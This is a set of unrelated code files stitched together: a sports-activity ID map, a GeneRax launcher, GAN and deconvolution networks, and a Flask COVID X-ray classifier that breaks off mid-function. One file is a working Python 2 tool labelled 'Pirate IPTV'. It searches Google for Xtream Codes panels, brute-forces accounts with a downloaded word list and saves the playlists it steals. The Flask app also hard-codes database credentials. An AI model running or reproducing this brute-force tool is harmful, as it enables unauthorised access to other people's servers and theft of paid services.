        eActivityId._02_PATINAJE: act02,
        eActivityId._03_FUTSAL: act03,
        eActivityId._04_FUTBOL: act04,
        eActivityId._05_PORRISMO: act05,
        eActivityId._06_ATLETISMO: act06,
        eActivityId._07_BALONCESTO: act07,
        eActivityId._08_KARATE_DO: act08,
        eActivityId._09_LEVANTAMIENTO_DE_PESAS: act09,
        eActivityId._10_TAEKWON_DO: act10,
        eActivityId._11_BADMINTON: act11,
        eActivityId._12_TENIS_DE_MESA: act12,
        eActivityId._13_ESGRIMA: act13,
        eActivityId._14_GIMNASIA_ARTISTICA: act14,
        eActivityId._15_AJEDREZ: act15,
        eActivityId._16_AEROBICOS: act16,
        eActivityId._17_NATACION: act17,
        eActivityId._18_BOXEO: act18,
        eActivityId._19_EQUITACION: act19,
        eActivityId._20_GOLF: act20,
        eActivityId._21_JUDO: act21,
        eActivityId._22_RUGBY: act22,
        eActivityId._23_TENIS: act23,
        eActivityId._24_VOLEIBOL: act24,
        eActivityId._25_HOCKEY: act25,
        eActivityId._26_TEATRO: act26,
        eActivityId._27_MUSICA: act27,
        eActivityId._28_DANZA_FOLCLORICA: act28,
        eActivityId._29_BREAK_DANCE: act29,
        eActivityId._30_BALLET: act30,
        eActivityId._31_HIP_HOP: act31,
        eActivityId._32_FOTOGRAFIA: act32,
        eActivityId._33_CANTO: act33,
        eActivityId._34_DIBUJO_ARTISTICO: act34,
        eActivityId._35_CERAMICA: act35,
        eActivityId._36_ACUARELA: act36,
        eActivityId._37_REALIZACION_AUDIOVISUAL: act37,
        eActivityId._38_CREACION_NARRATIVA: act38,
        eActivityId._39_POESIA_Y_DECLAMACION: act39,
        eActivityId._40_BANDA_MARCIAL: act40,
        eActivityId._41_MUSICA_ANDINA: act41,
        eActivityId._42_GUITARRA: act42,
        eActivityId._43_TITERES: act43,
        eActivityId._44_FLAUTAS: act44,
        eActivityId._45_CLUB_DE_LECTURA: act45,
        eActivityId._46_GRUPO_DE_ROCK: act46,
        eActivityId._47_BANDA_SINFONICA: act47,
        eActivityId._48_GAITAS_Y_TAMBORES: act48,
        eActivityId._49_MUSICA_CARRANGUERA: act49,
        eActivityId._50_PIANO: act50,
        eActivityId._51_INSTITUTO_COLOMBIANO_DE_BIENESTAR_FAMILIAR: act51,
        eActivityId._52_POLICIA_NACIONAL: act52,
        eActivityId._53_COMISARIA_DE_FAMILIA: act53,
        eActivityId._54_CASA_DE_LA_JUSTICIA: act54,
        eActivityId._55_ALCALDIA: act55,
        eActivityId._56_SERVICIO_NACIONAL_DE_APRENDIZAJE: act56,
        eActivityId._57_CASA_DE_LA_CULTURA: act57,
        eActivityId._58_INSTITUTO_MUNICIPAL_DE_RECREACION_Y_DEPORTE: act58,
        eActivityId._59_HOSPITAL: act59,
        eActivityId._60_CASA_UNIDOS: act60,
        eActivityId._61_COMODIN: act61,
    }
|
#!/usr/bin/python3
class Rectangle:
    """An intentionally empty placeholder class for a rectangle."""
|
import sys
import os
import subprocess
sys.path.insert(0, 'scripts')
sys.path.insert(0, 'tools/families')
sys.path.insert(0, 'tools/generax')
import saved_metrics
import rf_cells
import experiments as exp
import shutil
import time
import fam
import sequence_model
import fast_rf_cells
import extract_event_number
import events
def get_possible_strategies():
    """Return the gene-tree search strategies this pipeline supports."""
    strategies = ("SPR", "EVAL", "SKIP", "RECONCILE")
    return list(strategies)
def check_inputs(strategy):
    """Abort the program when *strategy* is not a supported search strategy."""
    if strategy not in get_possible_strategies():
        print("Unknown search strategy " + strategy)
        exit(1)
def has_multiple_sample(starting_tree):
    """True when the starting-tree name refers to a multi-sample tree set."""
    lowered = starting_tree.lower()
    return ("ale" in lowered) or ("multiple" in lowered)
def get_starting_tree_path(datadir, subst_model, family, starting_tree):
  """Return the path of the starting gene tree file for one family.

  The commented-out branch used to point multi-sample starting trees to a
  one-sample file; currently every case resolves through
  fam.build_gene_tree_path.
  """
  #if (has_multiple_sample(starting_tree)):
  #  return os.path.join(fam.get_family_misc_dir(datadir, family), starting_tree + "." + subst_model + "_onesample.geneTree")
  #else:
  return fam.build_gene_tree_path(datadir, subst_model, family, starting_tree)
# GeneRax does not accept tree files with multiple trees
def sample_one_starting_tree(datadir, subst_model, starting_tree):
  """Reduce each family's starting-tree file to its first tree only.

  Reads the first line (one newick tree) from the multi-tree file and
  rewrites the target path with just that tree.  Fix: the original left
  both file handles unclosed; context managers now guarantee the input is
  closed before the output is (re)written.
  """
  for family in fam.get_families_list(datadir):
    input_tree = fam.build_gene_tree_path(datadir, subst_model, family, starting_tree)
    output_tree = get_starting_tree_path(datadir, subst_model, family, starting_tree)
    with open(input_tree, "r") as reader:
      tree = reader.readline()
    with open(output_tree, "w") as writer:
      writer.write(tree)
def build_generax_families_file(datadir, starting_tree, subst_model, output):
  """Write the GeneRax [FAMILIES] configuration file to *output*.

  For every family directory under <datadir>/families, writes the family
  name, its starting gene tree, alignment, species mapping and
  substitution model.  Multi-sample starting trees are first reduced to a
  single tree per family.  Fix: removed the unused local `plop`.
  """
  if (has_multiple_sample(starting_tree)):
    sample_one_starting_tree(datadir, subst_model, starting_tree)
  families_dir = os.path.join(datadir, "families")
  with open(output, "w") as writer:
    writer.write("[FAMILIES]\n")
    print("starting gene tree " + starting_tree)
    for family in os.listdir(families_dir):
      family_path = os.path.join(families_dir, family)
      writer.write("- " + family + "\n")
      gene_tree = get_starting_tree_path(datadir, subst_model, family, starting_tree)
      if (starting_tree == "random"):
        # Special token: GeneRax generates its own random starting trees.
        gene_tree = "__random__"
      writer.write("starting_gene_tree = " + gene_tree + "\n")
      writer.write("alignment = " + fam.get_alignment_file(family_path) + "\n")
      writer.write("mapping = " + fam.get_mappings(datadir, family) + "\n")
      raxml_model = ""
      if (starting_tree != "random" and starting_tree != "true"):
        raxml_model = fam.get_raxml_best_model(datadir, subst_model, family)
      if (os.path.isfile(raxml_model)):
        # Reuse the per-family model file inferred by a previous raxml run.
        writer.write("subst_model = " + raxml_model + "\n")
      else:
        writer.write("subst_model = " + sequence_model.get_raxml_model(subst_model) + "\n")
def get_generax_command(generax_families_file, species_tree, strategy, additional_arguments, output_dir, mode, cores):
  """Assemble the mpirun command line that launches GeneRax.

  Consumes the "--old" flag from additional_arguments; the remaining extra
  arguments are forwarded verbatim at the end of the command.
  """
  executable = exp.generax_exec
  old = exp.checkAndDelete("--old", additional_arguments)
  if (mode == "gprof"):
    executable = exp.generax_gprof_exec
  elif (mode == "scalasca"):
    executable = exp.generax_scalasca_exec
  if (old):
    # The legacy binary lives next to the current one with an "old" suffix.
    executable += "old"
  generax_output = os.path.join(output_dir, "generax")
  command = ["mpirun", "-np", str(cores), executable,
             "-f", generax_families_file,
             "-s", species_tree,
             "--strategy", strategy,
             "-p", generax_output]
  command.extend(additional_arguments)
  return " ".join(command)
def run_generax(datadir, subst_model, strategy, species_tree, generax_families_file, mode, cores, additional_arguments, resultsdir):
  """Resolve the species tree path, build the GeneRax command, and run it.

  Raises subprocess.CalledProcessError if GeneRax exits with a non-zero
  status.
  """
  species_tree = fam.get_species_tree(datadir, subst_model, species_tree)
  command = get_generax_command(generax_families_file, species_tree, strategy, additional_arguments, resultsdir, mode, cores)
  print(command)
  subprocess.check_call(command.split(" "), stdout = sys.stdout)
def get_mode_from_additional_arguments(additional_arguments):
  """Pop a profiling flag from the argument list and return the run mode.

  Returns "scalasca" or "gprof" (removing the matching flag in place,
  scalasca taking precedence), or "normal" when neither flag is present.
  """
  for flag, mode in (("--scalasca", "scalasca"), ("--gprof", "gprof")):
    if flag in additional_arguments:
      additional_arguments.remove(flag)
      return mode
  return "normal"
def extract_trees(datadir, results_family_dir, run_name, subst_model):
  """Copy each family's reconciled gene tree into the datadir run results.

  Best effort: families whose reconciliation output is missing are
  silently skipped.  Fix: the bare `except:` (which also swallowed
  KeyboardInterrupt/SystemExit) is narrowed to OSError, the exception
  family shutil.copy actually raises for missing/unreadable files.
  """
  results_dir = os.path.join(results_family_dir, "reconciliations")
  for family in fam.get_families_list(datadir):
    #source = os.path.join(results_dir, family, "geneTree.newick")
    source = os.path.join(results_dir, family + "_events.newick")
    dest = fam.build_gene_tree_path_from_run(datadir, family, run_name)
    try:
      shutil.copy(source, dest)
    except OSError:
      pass
def get_run_name(species_tree, gene_trees, subst_model, strategy, additional_arguments):
  """Build the run identifier encoding the main GeneRax options.

  The name concatenates strategy, reconciliation model, SPR radius,
  optional rooting/rate/transfer-constraint/seed markers and the
  substitution model.  species_tree and gene_trees are accepted for
  interface compatibility but do not influence the name.
  """
  rec_model = exp.getArg("--rec-model", additional_arguments, "UndatedDTL")
  radius = exp.getArg("--max-spr-radius", additional_arguments, "5")
  parts = ["generax-" + strategy + "-" + rec_model + "-r" + radius]
  if ("--mad-rooting" in additional_arguments):
    parts.append("-mad")
  if ("--per-family-rates" in additional_arguments):
    parts.append("-famrates")
  if ("--per-species-rates" in additional_arguments):
    parts.append("-speciesrates")
  tc = exp.getArg("--transfer-constraint", additional_arguments, "NONE")
  if (tc == "PARENTS"):
    parts.append("-tcparent")
  if (tc == "SOFTDATED"):
    parts.append("-tcsoft")
  seed = exp.getArg("--seed", additional_arguments, None)
  if (seed != None):
    parts.append("-seed" + str(seed))
  parts.append("." + subst_model)
  return "".join(parts)
def extract_events(datadir, results_family_dir, additional_arguments):
  """Collect per-family DTL event counts from a GeneRax run and store them.

  Reads the reconciliation model and SPR radius back from the argument
  list so the counts are filed under the right configuration.
  """
  #try:
  rec_model = exp.getArg("--rec-model", additional_arguments, "UndatedDTL")
  radius = int(exp.getArg("--max-spr-radius", additional_arguments, "5"))
  event_counts = extract_event_number.extract(results_family_dir)
  events.update_event_counts(datadir, rec_model, radius, event_counts)
def run(datadir, subst_model, strategy, species_tree, starting_tree, cores, additional_arguments, resultsdir, do_analyze = True, do_extract = True):
  """Run one GeneRax experiment end to end and return the results dir.

  Builds the families file, runs GeneRax, records the elapsed time, then
  optionally copies the inferred trees back, runs the RF-distance
  analysis, and extracts event counts.
  """
  run_name = exp.getAndDelete("--run", additional_arguments, None)
  if (None == run_name):
    run_name = get_run_name(species_tree, starting_tree, subst_model, strategy, additional_arguments)
  # NOTE(review): arg_analyze is consumed from the arguments but no longer
  # used since the line below was commented out.
  arg_analyze = exp.getAndDelete("--analyze", additional_arguments, "yes")
  #do_analyze = do_analyze and (arg_analyze == "yes") and (strategy != "EVAL")
  print("Run name " + run_name)
  sys.stdout.flush()
  mode = get_mode_from_additional_arguments(additional_arguments)
  generax_families_file = os.path.join(resultsdir, "families.txt")
  build_generax_families_file(datadir, starting_tree, subst_model, generax_families_file)
  start = time.time()
  run_generax(datadir, subst_model, strategy, species_tree, generax_families_file, mode, cores, additional_arguments, resultsdir)
  # NOTE(review): the same elapsed time is stored under both "runtimes"
  # and "seqtimes" -- presumably seqtimes should measure something else;
  # confirm.
  saved_metrics.save_metrics(datadir, run_name, (time.time() - start), "runtimes")
  saved_metrics.save_metrics(datadir, run_name, (time.time() - start), "seqtimes")
  # radius feeds the commented-out guard below; kept for reference.
  radius = int(exp.getArg("--max-spr-radius", additional_arguments, "5"))
  #if (radius == 0):
  #  print("Warning, not extracting trees when --max-spr-radius 0 is set")
  #  do_extract = False
  #  do_analyze = False
  if (do_extract):
    extract_trees(datadir, os.path.join(resultsdir, "generax"), run_name, subst_model)
  try:
    if (do_analyze):
      fast_rf_cells.analyze(datadir, "all", cores, run_name)
    #rf_cells.analyze(datadir, "all", True)
  except:
    # Best effort: a failed RF analysis does not abort the run.
    print("Analyze failed!!!!")
  extract_events(datadir, os.path.join(resultsdir, "generax"), additional_arguments)
  print("Output in " + resultsdir)
  return resultsdir
def launch(datadir, subst_model, strategy, species_tree, starting_tree, cluster, cores, additional_arguments):
  """Submit this very script to the cluster as a worker invocation.

  Re-invokes the current command line with "--exprun" and the freshly
  created results directory appended; the __main__ block detects that
  marker and calls run() instead of launch().
  """
  command = ["python3"]
  command.extend(sys.argv)
  command.append("--exprun")
  dataset = os.path.basename(datadir)
  resultsdir = os.path.join("GeneRax", dataset, strategy + "_" + species_tree + "_start_" + starting_tree, "run")
  resultsdir = exp.create_result_dir(resultsdir, additional_arguments)
  submit_path = os.path.join(resultsdir, "submit.sh")
  command.append(resultsdir)
  print(" ".join(command))
  exp.submit(submit_path, " ".join(command), cores, cluster)
if (__name__ == "__main__"):
  # Entry point.  Two modes: a normal invocation submits the job via
  # launch(); a worker invocation (marked by "--exprun" with the results
  # directory appended as the last argument) executes run() directly.
  print("launch_generax " + str(sys.argv))
  is_run = ("--exprun" in sys.argv)
  resultsdir = ""
  if (is_run):
    resultsdir = sys.argv[-1]
    # Strip the trailing "--exprun <resultsdir>" pair added by launch().
    sys.argv = sys.argv[:-2]
  min_args_number = 8
  if (len(sys.argv) < min_args_number):
    print("Syntax error: python " + os.path.basename(__file__) + " dataset species_tree gene_trees subst_model strategy cluster cores [additional paremeters].\n ")
    sys.exit(1)
  datadir = os.path.normpath(sys.argv[1])
  species_tree = sys.argv[2]
  starting_tree = sys.argv[3]
  subst_model = sys.argv[4]
  strategy = sys.argv[5]
  cluster = sys.argv[6]
  cores = int(sys.argv[7])
  # Everything after the positional arguments is forwarded to GeneRax.
  additional_arguments = sys.argv[min_args_number:]
  check_inputs(strategy)
  if (starting_tree == "raxml"):
    print("use raxml-ng instead of raxml please")
    exit(1)
  if (is_run):
    run(datadir, subst_model, strategy, species_tree, starting_tree, cores, additional_arguments, resultsdir)
  else:
    launch(datadir, subst_model, strategy, species_tree, starting_tree, cluster, cores, additional_arguments)
|
import chainer
import numpy as np
import chainer.functions as F
import chainer.links as L
from chainer import optimizers
from chainer import Variable
from chainer import serializers
import PIL.Image as Image
import matplotlib.pyplot as plt
def trainer(G,D,data,len_z=100,n_epoch=10000,pre_epoch=0,batchsize=500,save_interval=1000,
            output_dir=None,G_path=None,D_path=None,show=True):
    """Adversarial training loop for a GAN (Python 2 / chainer).

    G, D: generator and discriminator chains; data: training images.
    Optionally resumes from saved HDF5 snapshots (G_path/D_path) and, every
    save_interval epochs, snapshots both models and saves a sample image.
    Returns (loss_g_mem, loss_d_mem): per-epoch accumulated losses.
    """
    opt_g = optimizers.Adam(alpha=0.0002, beta1=0.5)
    opt_d = optimizers.Adam(alpha=0.0002, beta1=0.5)
    opt_g.setup(G)
    opt_d.setup(D)
    opt_g.add_hook(chainer.optimizer.WeightDecay(0.00001))
    opt_d.add_hook(chainer.optimizer.WeightDecay(0.00001))
    # Resume from previous snapshots when paths are given.
    if D_path != None:
        serializers.load_hdf5("%s"%(D_path), D)
    if G_path != None:
        serializers.load_hdf5("%s"%(G_path), G)
    n_epoch += pre_epoch
    loss_d_mem =np.zeros(n_epoch-pre_epoch)
    loss_g_mem =np.zeros(n_epoch-pre_epoch)
    for epoch in xrange(pre_epoch,n_epoch):
        if epoch%10==0: print 'epoch',epoch
        perm = np.arange(len(data))
        np.random.shuffle(perm)
        for i in xrange(0,len(data),batchsize):
            # Generator pass: D's opinion on fake images.
            z = Variable(np.random.uniform(-1,1,(batchsize, len_z)).astype(np.float32))
            y1 = G(z)
            y2 = D(y1)
            # discriminator
            loss_d = F.sigmoid_cross_entropy(y2,Variable(np.zeros((batchsize,1),dtype=np.int32)))
            loss_g = F.sigmoid_cross_entropy(y2,Variable(np.ones((batchsize,1),dtype=np.int32)))
            # get images
            images = data[perm[i:i+batchsize]]
            y2 = D(Variable(images))
            loss_d += F.sigmoid_cross_entropy(y2,Variable(np.ones((images.shape[0],1),dtype=np.int32)))
            # epoch-n_epoch is a negative index that maps pre_epoch..n_epoch-1
            # onto 0..len-1 of the loss arrays.
            loss_d_mem[epoch-n_epoch] += loss_d.data
            loss_g_mem[epoch-n_epoch] += loss_g.data
            opt_g.zero_grads()
            loss_g.backward()
            opt_g.update()
            opt_d.zero_grads()
            loss_d.backward()
            opt_d.update()
        #save model
        if (epoch+1)%save_interval == 0:
            # Generate a small sample batch (test mode) for inspection.
            z = Variable(np.random.uniform(-1,1,(10, len_z)).astype(np.float32))
            confirm = G(z,False)
            if output_dir != None:
                serializers.save_hdf5("%s/gan_model_dis%d.h5"%(output_dir,epoch+1), D)
                serializers.save_hdf5("%s/gan_model_gen%d.h5"%(output_dir,epoch+1), G)
                serializers.save_hdf5("%s/current_gen.h5"%(output_dir), G)
            if show:
                # RGB images need channel-last layout for imshow.
                if D.imshape[0] == 3:
                    plt.imshow(np.swapaxes(np.swapaxes(confirm.data[0], 0, 2),0,1))
                else:
                    plt.imshow(confirm.data[0].reshape(D.imshape[1],D.imshape[2]),cmap="gray")
                plt.axis('off')
                plt.savefig('%s/image%d.jpg'%(output_dir,epoch+1))
                print '--%d--'%(epoch+1)
                print 'p_g :',D(confirm,False).data[0]
                print 'p_delta:', D(Variable(images),False).data[0]
    print 'done'
    return loss_g_mem,loss_d_mem
|
# coding with UTF-8
# ******************************************
# *****CIFAR-10 with ResNet8 in Pytorch*****
# *****deconv_network.py *****
# *****Author:Shiyi Liu *****
# *****Time: Oct 22nd, 2019 *****
# ******************************************
import torch
import torch.nn as nn
class OurConvTranspose2d(nn.ConvTranspose2d):
    """A ConvTranspose2d whose kernel is initialised from a given tensor.

    Used to mirror an encoder convolution: the caller passes the weight
    tensor that should replace the randomly initialised one.
    """

    def __init__(self, in_channels, out_channels, weight, kernel_size=3, stride=1, padding=1, output_padding=0, bias=False):
        super().__init__(
            in_channels=in_channels,
            out_channels=out_channels,
            kernel_size=kernel_size,
            stride=stride,
            padding=padding,
            output_padding=output_padding,
            bias=bias,
        )
        # Overwrite the random initialisation with the supplied kernel.
        self.weight.data = weight
class Deconv1(nn.Module):
    """ReLU followed by one transposed convolution.

    Mirrors a single 3x3 encoder convolution; conv_weight supplies the
    kernel for the transposed layer.  groups and dilation are accepted for
    interface compatibility but are not used.
    """

    def __init__(self, inplanes, outplanes, conv_weight, padding=1, stride=1, groups=1, dilation=1):
        super().__init__()
        self.relu = nn.ReLU(inplace=True)
        self.deconv1 = OurConvTranspose2d(
            in_channels=inplanes,
            out_channels=outplanes,
            weight=conv_weight,
            kernel_size=3,
            stride=stride,
            padding=padding,
            output_padding=0,
        )

    def forward(self, x):
        """Apply ReLU, then the transposed convolution."""
        return self.deconv1(self.relu(x))
class Deconv_BasicBlock(nn.Module):
    """Transposed-convolution mirror of a ResNet BasicBlock.

    deconv_weights holds, in order: [0] the kernel mirroring the block's
    second conv, [1] the kernel mirroring the first conv, and -- only when
    a projection shortcut is needed -- [2] the 1x1 shortcut kernel.
    """
    def __init__(self, inplanes, outplanes, deconv_weights, stride=1):
        super(Deconv_BasicBlock, self).__init__()
        # Mirror of conv2: stride 1, 'same' padding.
        self.deconv2 = OurConvTranspose2d(inplanes, inplanes, deconv_weights[0], kernel_size=3, stride=1, padding=1, bias=False)
        self.relu = nn.ReLU(inplace=True)
        # Mirror of conv1; output_padding=stride-1 restores the spatial size
        # halved by a stride-2 convolution in the forward network.
        self.deconv1 = OurConvTranspose2d(inplanes, outplanes, deconv_weights[1], kernel_size=3, stride=stride, padding=1, output_padding=stride-1, bias=False)
        self.shortcut = nn.Sequential()
        if inplanes != outplanes or stride != 1:
            # Projection shortcut mirroring the 1x1 downsampling conv.
            self.shortcut = nn.Sequential(
                OurConvTranspose2d(inplanes, outplanes, deconv_weights[2], kernel_size=1, stride=stride, output_padding=stride-1, padding=0, bias=False)
            )
    def forward(self, x):
        # ReLU once, then feed both the main path and the shortcut.
        x = self.relu(x)
        # print('\tbasic input: {}'.format(x.size()))
        out = self.relu(self.deconv2(x))
        # print('\tafter deconv2: {}'.format(out.size()))
        out = self.deconv1(out)
        # print('\tafter deconv1: {}'.format(out.size()))
        out += self.shortcut(x)
        return out
class Deconv_ResNet18(nn.Module):
    """Decoder mirroring a ResNet18 encoder with transposed convolutions.

    deconv_weight is a list of kernels ordered like the forward network's
    convolutions: slices [1:5], [5:10], [10:15], [15:20] feed the four
    residual stages, which are applied here in reverse order (the deepest
    stage first).  num_classes is accepted for interface compatibility.
    """
    def __init__(self, deconv_weight, num_classes=10, deconv1=nn.Sequential()):
        # NOTE(review): the nn.Sequential() default for deconv1 is a shared
        # mutable default -- harmless only if it is never mutated; confirm.
        self.inplanes = 512
        super(Deconv_ResNet18, self).__init__()
        self.deconv5_x = self._make_layer(256, deconv_weight[15:20], 2)
        self.deconv4_x = self._make_layer(128, deconv_weight[10:15], 2)
        self.deconv3_x = self._make_layer(64, deconv_weight[5:10], 2)
        self.deconv2_x = self._make_layer(64, deconv_weight[1:5], 1)
        self.deconv1 = deconv1
    def _make_layer(self, planes, basic_weights, stride):
        """Build one decoder stage (two mirrored BasicBlocks).

        The forward stage's second block is mirrored first; weight indices
        are picked so that each transposed conv receives the kernel of the
        convolution it undoes (downsampling stages carry an extra 1x1
        shortcut kernel at basic_weights[2]).
        """
        layers = []
        block_weight2 = [basic_weights[4], basic_weights[3]] if stride==2 else [basic_weights[3], basic_weights[2]]
        layers.append(Deconv_BasicBlock(self.inplanes, self.inplanes, block_weight2, stride=1))
        block_weight1 = [basic_weights[1], basic_weights[0], basic_weights[2]] if stride == 2 else [basic_weights[1],
                                                                                                   basic_weights[0]]
        layers.append(Deconv_BasicBlock(self.inplanes, planes, block_weight1, stride=stride))
        self.inplanes = planes
        return nn.Sequential(*layers)
    def forward(self, x):
        # Stages run deepest-first to invert the encoder's order.
        # print('resnet input : {}'.format(x.size()))
        out = self.deconv5_x(x)
        # print('resnet after deconv5: {}'.format(out.size()))
        out = self.deconv4_x(out)
        # print('resnet after deconv4: {}'.format(out.size()))
        out = self.deconv3_x(out)
        # print('resnet after deconv3: {}'.format(out.size()))
        out = self.deconv2_x(out)
        # print('resnet after deconv2: {}'.format(out.size()))
        out = self.deconv1(out)
        return out
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import google
from urlparse import urlparse
import sys
import os
from sys import argv as s
import time
from tqdm import tqdm
from termcolor import colored
import platform
from os.path import expanduser
import wget
# NOTE(review): platform.release() returns a string, so the original
# comparison with the integer 7 was always False and the Windows 7
# taskbar-icon setup below never executed.  Fixed to compare with '7'.
if platform.release() == '7':
    import ctypes
    from ctypes import wintypes
    lpBuffer = wintypes.LPWSTR()
    AppUserModelID = ctypes.windll.shell32.GetCurrentProcessExplicitAppUserModelID
    AppUserModelID(ctypes.cast(ctypes.byref(lpBuffer), wintypes.LPWSTR))
    appid = lpBuffer.value
    ctypes.windll.kernel32.LocalFree(lpBuffer)
    if appid is not None:
        print(appid)
    myappid = 'IPTV' # arbitrary string
    ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)
    # for icon in task bar windows 7
# Choose the path separator for the working directory below.
if os.name == 'posix':
    separatore = "/"
else:
    separatore = """\\"""
if os.name == 'posix':
    dir_iptv = expanduser("~") + separatore + "IPTV"
else:
    dir_iptv = separatore + "IPTV"
# Create (or reuse) the working directory and make it current.
if os.path.exists(dir_iptv):
    os.chdir(dir_iptv)
else:
    os.mkdir(dir_iptv)
    os.chdir(dir_iptv)
# Download the word list used as username/password candidates.
download_list = 'https://raw.githubusercontent.com/Pinperepette/IPTV/master/iptv/names/it.txt'
download = wget.download(download_list)
download
# Fix: guard the mkdir so a second run inside an existing IPTV working
# directory no longer crashes with "File exists".
if not os.path.exists("output"):
    os.mkdir("output")
class IPTV(object):
    """Finds Xtream-Codes IPTV panels via Google and brute-forces accounts
    from a word list (Python 2 script).

    Instances double as a context manager that temporarily redirects
    stdout/stderr (used to silence the google module during searches).
    """
    def __init__(self, stdout=None, stderr=None):
        # Replacement streams for the context-manager role; default to the
        # current standard streams.
        self._stdout = stdout or sys.stdout
        self._stderr = stderr or sys.stderr
        self.lista = 'it.txt'                  # word list downloaded at import time
        self.query = 'Xtream Codes v1.0.59.5'  # Google dork for the panel version
        self.directory = "output"              # where found playlists are stored
        self.msg = "Pirate IPTV"
        self.parsedUrls = ['']
    def __enter__(self):
        # Remember and swap the global streams.
        self.old_stdout, self.old_stderr = sys.stdout, sys.stderr
        self.old_stdout.flush(); self.old_stderr.flush()
        sys.stdout, sys.stderr = self._stdout, self._stderr
    def __exit__(self, exc_type, exc_value, traceback):
        # Restore the original streams.
        self._stdout.flush(); self._stderr.flush()
        sys.stdout = self.old_stdout
        sys.stderr = self.old_stderr
    def print_link(self):
        """Print scheme://host for every Google hit of the dork query."""
        with IPTV(stdout=devnull, stderr=devnull):
            for url in google.search(self.query, num=60, stop=1):
                parsed = urlparse(url)
                self.parsedUrls.append(parsed.scheme + '://' + parsed.netloc +"\n")
                time.sleep(1)
        print '\n'.join(self.parsedUrls)
    def search_account(self,URL, b=1, bsize=1):
        """Try each word-list entry as username==password against URL.

        Any non-empty playlist response is counted and written under
        output/<host>/tv_channels_<word>.m3u.
        """
        segale_rosso = colored ('[*]','red')
        segale_verde = colored ('[*]','green')
        print (segale_rosso + ' [CTRL + c] = [IPTV Attack Interrupted]')
        t= tqdm()
        last_b = [0]
        # NOTE(review): the word list is opened twice and the first handle
        # (righe) is never closed -- only used to count the entries.
        righe = open( self.lista ,'r')
        tsize = len(righe.readlines())
        TT = (str(tsize))
        t.total = tsize
        tr = 0
        with open(self.lista) as f:
            content = f.readlines()
        for r in content:
            # Same word used for username and password.
            req = urllib2.Request( URL + '/get.php?username=%s&password=%s&type=m3u&output=mpegts'%(r.rstrip().lstrip(),r.rstrip().lstrip()))
            response = urllib2.urlopen(req)
            the_page = response.read()
            tsize = (tsize - 1)
            t.update((b - last_b[0]) * bsize)
            last_b[0] = b
            TM = (str(tsize))
            time.sleep(0.2)
            if len(the_page) > 0:
                tr = (tr + 1)
                msg = (segale_verde + " Account found: ")
                print (msg + str(tr))
                new_path = self.directory + "/" + URL.replace("http://", "")
                if os.path.exists(new_path) is False:
                    os.makedirs(new_path)
                out_file = open(str(new_path) + "/tv_channels_%s.m3u" % r.rstrip().lstrip(), "w")
                out_file.write(the_page)
                out_file.close()
    def usage(self):
        """Print the command-line help."""
        print ('##### USAGE #####')
        print ("for print list server " + s[0] + " " + "-pl")
        print ("for search account " + s[0] + " " + "http://site.server")
if __name__ == "__main__":
    # Dispatch on the first CLI argument: no args / -h -> usage,
    # -pl -> list candidate servers, anything else -> brute-force that URL.
    try:
        app = IPTV()
        devnull = open(os.devnull, 'w')
        if len(s) == 1:
            app.usage()
            exit()
        if s[1] == '-h':
            app.usage()
            exit()
        if s[1] == '-pl':
            app.print_link()
            exit()
        app.search_account(s[1])
    except KeyboardInterrupt:
        # Ctrl+C aborts the attack cleanly.
        segale_giallo = colored ('[*]','yellow')
        print ("\r" + segale_giallo + ' IPTV Attack Interrupted')
        sys.exit(0)
|
from flask import Flask, flash, request, redirect, url_for, render_template
import urllib.request
import os
from werkzeug.utils import secure_filename
import pickle
from keras.applications.imagenet_utils import preprocess_input, decode_predictions
from keras.models import load_model
from keras.preprocessing import image
from flask import Flask, redirect, url_for, request, render_template
from werkzeug.utils import secure_filename
from gevent.pywsgi import WSGIServer
from PIL import Image
import psycopg2 #pip install psycopg2
import psycopg2.extras
import torchvision
import torch
import numpy as np
# Path to the fine-tuned classifier weights (a state_dict for resnet18).
MODEL_PATH = 'models/covid_classifier.h5'
resnet18 = torchvision.models.resnet18(pretrained=True)
# Replace the final fully-connected layer with a 3-class head.
resnet18.fc = torch.nn.Linear(in_features=512, out_features=3)
resnet18.load_state_dict(torch.load(MODEL_PATH))
resnet18.eval()
# Index order must match the training labels.
class_names = ['normal', 'viral', 'covid']
#resnet18 = torchvision.models.resnet18(pretrained=True)
# NOTE(review): train_transform is defined but never used in this app --
# presumably kept from the training notebook.
train_transform = torchvision.transforms.Compose([
    torchvision.transforms.Resize(size=(224, 224)),
    torchvision.transforms.RandomHorizontalFlip(),
    torchvision.transforms.ToTensor(),
    torchvision.transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
# Deterministic preprocessing applied at inference time (ImageNet statistics).
test_transform = torchvision.transforms.Compose([
    torchvision.transforms.Resize(size=(224, 224)),
    torchvision.transforms.ToTensor(),
    torchvision.transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
def predict_image_class(image_path):
    """Classify a chest X-ray image with the global resnet18 model.

    image_path: a path or file-like object accepted by PIL.Image.open.
    Returns (probabilities, predicted_class_index, predicted_class_name),
    where probabilities is a length-3 numpy array aligned with class_names.
    """
    image = Image.open(image_path).convert('RGB')
    image = test_transform(image)
    # Please note that the transform is defined already in a previous code cell
    image = image.unsqueeze(0)  # add the batch dimension
    output = resnet18(image)[0]
    # Convert raw logits into a probability distribution over the 3 classes.
    probabilities = torch.nn.Softmax(dim=0)(output)
    probabilities = probabilities.cpu().detach().numpy()
    predicted_class_index = np.argmax(probabilities)
    predicted_class_name = class_names[predicted_class_index]
    return probabilities, predicted_class_index, predicted_class_name
print('Model loaded. Check http://127.0.0.1:5000/')
app = Flask(__name__)
app.secret_key = "cairocoders-ednalan"
# NOTE(review): hard-coded database credentials -- move these to
# environment variables or a config file before deploying.
DB_HOST = "localhost"
DB_NAME = "CC_photo"
DB_USER = "bob"
DB_PASS = "admin"
conn = psycopg2.connect(dbname=DB_NAME, user=DB_USER, password=DB_PASS, host=DB_HOST)
UPLOAD_FOLDER = 'static/uploads/'
# NOTE(review): secret_key is assigned twice (above and here); this later
# value is the one that takes effect.
app.secret_key = "secret key"
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024  # 16 MB upload cap
# Image extensions accepted for upload.
ALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg', 'gif'}
def allowed_file(filename):
    """Return True when *filename* has an extension we accept for upload."""
    if '.' not in filename:
        return False
    extension = filename.rsplit('.', 1)[1].lower()
